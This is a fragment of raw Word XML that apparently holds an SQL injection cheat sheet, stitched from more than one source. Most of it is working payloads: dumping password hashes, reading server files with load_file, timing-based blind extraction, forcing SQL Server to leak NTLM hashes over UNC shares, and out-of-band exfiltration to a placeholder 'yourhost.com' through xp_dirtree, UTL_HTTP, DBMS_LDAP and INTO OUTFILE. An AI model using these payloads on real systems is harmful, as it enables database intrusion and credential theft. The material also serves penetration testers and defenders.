          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>new file </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>can not modify existing file</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0928115B"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UDF Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612E966A"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create function LockWorkStation returns integer soname 'user32';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534D4FDA"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LockWorkStation(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FD34E3"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create function ExitProcess returns integer soname 'kernel32';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E2C860"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exitprocess();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422DD188"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USER();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CC3342"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password,USER() FROM mysql.user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED7578D"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First byte of admin hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46467757"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SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185D2A83"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Read File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49349844"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query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C236C8"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MySQL Load Data infile </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BC547A"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b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>By default it's not available !</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E017A2D" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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lastRenderedPageBreak/>
        <w:t>create table foo( line blob ); </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:br/>
        <w:t>load data infile 'c:/boot.ini' into table foo; </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:br/>
        <w:t>select * from foo;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B9077B"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More Timing in MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A60F28B"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benchmark( 500000, sha1( 'test' ) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044597E4"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query.php?user=1+union+select+benchmark(500000,sha1 (0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE0ADB0" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' ); </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Enumeration data, Guessed Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52742B0D" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>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select if( (ascii(substring(user(),1,1)) &gt;&gt; 7) &amp; 1, benchmark(100000,sha1('test')), 'false' );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA48423"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Potentially Useful MySQL Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6E1A91" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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MD5()</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MD5 Hashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FDFD14" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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SHA1()</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SHA1 Hashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE297EB" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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PASSWORD()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EB004A" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ENCODE()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7702B4" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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COMPRESS()</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Compress data, can be great in large binary reading in Blind SQL Injections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAF9BD8" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ROW_COUNT()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FA6909" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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t>SCHEMA()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9C679F" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>VERSION()</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Same as </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>@@version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67400112" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="750" w:after="450" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
        <w:t>Second Order SQL Injections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D76063A"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Basically, you put an SQL Injection to some place and expect it's unfiltered in another action. This is common hidden layer problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D9AE1E"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Name : </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>' + (SELECT TOP 1 password FROM users ) + ' </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Email :</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> xx@xx.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F9A6F0"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If application is using name field in an unsafe stored procedure or function, process etc. then it will insert first users password as your name etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6486308F"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Forcing SQL Server to get NTLM Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B01C2F5"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This attack can help you to get SQL Server user's Windows password of target server, but possibly you inbound connection will be firewalled. Can be very useful internal penetration tests. We force SQL Server to connect our Windows UNC Share and capture data NTLM session with a tool like Cain &amp; Abel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0DEC9" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="150" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Bulk insert from a UNC Share (S) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8F9E2E" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:p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Check out Bulk Insert Reference to understand how can you use bulk insert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B450C2" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="750" w:after="450" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Out of Band Channel Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778AFAAA"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SQL Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BF43F2" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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?vulnerableParam=1; SELECT * FROM OPENROWSET('SQLOLEDB', ({INJECTION})+'.yourhost.com';'sa';'pwd', 'SELECT 1')</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Makes DNS resolution request to {INJECT}.yourhost.com</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="299E5BE1" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="180"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?vulnerableParam=1; DECLARE @q varchar(1024); SET @q = '\\'+({INJECTION})+'.yourhost.com\\test.txt'; EXEC master..xp_dirtree @q</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Makes DNS resolution request to {INJECTION}.yourhost.com</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>{INJECTION} = You want to run the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B378CB9"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t>MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1E61B5" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:num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?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), 'yourhost.com\\')))</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Makes a NBNS query request/DNS resolution request to yourhost.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7197480C" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:num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?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE '\\\\yourhost.com\\share\\output.txt')</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Writes data to your shared folder/file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B3F8C2" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>{INJECTION} = You want to run the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5B02D1" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="600" w:after="375" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Oracle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5087EBAF" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:num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?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://host/ sniff.php?sniff='||({INJECTION})||'') FROM DUAL)</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Sniffer application will save results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096977A9" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:num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?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://host/ '||({INJECTION})||'.html') FROM DUAL)</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Results will be saved in HTTP access logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E205521" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:num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?vulnerableParam=(SELECT UTL_INADDR.get_host_addr(({INJECTION})||'.yourhost.com') FROM DUAL)</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>You need to sniff dns resolution requests to yourhost.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296E9873" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>?vulnerableParam=(SELECT SYS.DBMS_LDAP.INIT(({INJECTION})||'.yourhost.com',80) FROM DUAL)</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>You need to sniff dns resolution requests to yourhost.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DB35DE" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>{INJECTION} = You want to run the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196D45BF" w14:textId="03A4A08A" w:rsidR="00E213EB" w:rsidRDefault="00E213EB"/>
    <w:p w14:paraId="77136EED" w14:textId="77777777" w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w:rsidRDefault="00CC3B92" w:rsidP="00CC3B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C3B92">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Entry point detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9372BC"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Detection of an SQL injection entry point Simple characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A55AD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p>
    <w:p w14:paraId="609B651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%27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4482F66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p>
    <w:p w14:paraId="6F33CAB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%22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F4037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p>
    <w:p w14:paraId="1C36400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%23</w:t>
      </w:r>
    </w:p>
